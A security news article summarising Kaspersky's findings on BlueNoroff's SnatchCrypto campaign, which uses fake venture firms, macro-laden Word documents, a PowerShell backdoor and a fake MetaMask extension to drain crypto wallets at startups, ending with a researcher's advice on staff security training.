Unwary employees of crypto and fintech startups may be tricked into opening weaponized crypto documents that activate the SnatchCrypto.

Cryptocurrency stakeholders beware: an advanced persistent threat (APT) campaign is being aimed at small and medium-sized enterprises worldwide that can result in major cryptocurrency losses for the victims.

The campaign, SnatchCrypto, is aimed at various firms that deal with cryptocurrencies and smart contracts, DeFi, Blockchain, and the FinTech industry.

The APT perpetrator, BlueNoroff, has started fake venture capital firms to gain the trust of potential victims. The group that sends out a crypto “contract” or weaponized Word business document to employees of targeted firms that is actually a full-featured Windows backdoor with surveillance functions.

BlueNoroff is part of the larger Lazarus group and uses a diversified structure and sophisticated attack technologies for attacks on banks and servers connected to SWIFT. Devices of victims that have downloaded the legitimate-looking fake apps will, after a while, received backdoored updates that eventually proceed to empty the victim’s crypto wallet(s).

An attentive user may spot the fishy status message at the bottom of popup window when launching MS Word.

Method of operation

According to researchers from Kaspersky, the start-up crypto sector was chosen by the APT group for a reason: startups often receive letters or files from unfamiliar sources. Also, most cryptocurrency businesses are small or medium-sized firms, so they do not usually invest much funds into their internal security system. BlueNoroff understands this point and takes advantage of it by using elaborate social engineering schemes to gain the trust of victims.

Once their targets have opened a weaponized document, the macro does nothing until an internet connection is established. At that point, another macro-enabled document is downloaded to the victim’s device, deploying malware.

Besides weaponized Word documents, BlueNoroff also spreads malware disguised as zipped Windows shortcut files. The malware sends the victim’s general information and Powershell agent to a server, which then creates a full-featured backdoor. Using this, the group deploys other malicious tools such as a keylogger and screen capture tool to gather information furtively for weeks and months.

If a prominent target is detected to be using a popular browser extension to manage crypto wallets (for example, the Metamask extension), they replace the main component of the extension with a fake version.

Time for the payoff!

Ultimately, when any large crypto transfers and related activities are detected on the victims’ devices, the malware will notify the attackers, who can then intercept the transaction process and inject their own logic. To complete the initiated payment, the victim then clicks the “approve” button—at which point the attackers can change the recipient’s address and maximize the transaction amount, essentially draining the account in one move.

According to Seongsu Park, senior security researcher in Kaspersky’s Global Research and Analysis Team (GReAT): “As attackers continuously come up with a lot of new tricks, even small businesses should educate their employees on basic cybersecurity practices. This is especially essential if the company works with crypto wallets: it is an attractive target for APT and cybercriminals alike. Therefore, this sector needs to be well protected.”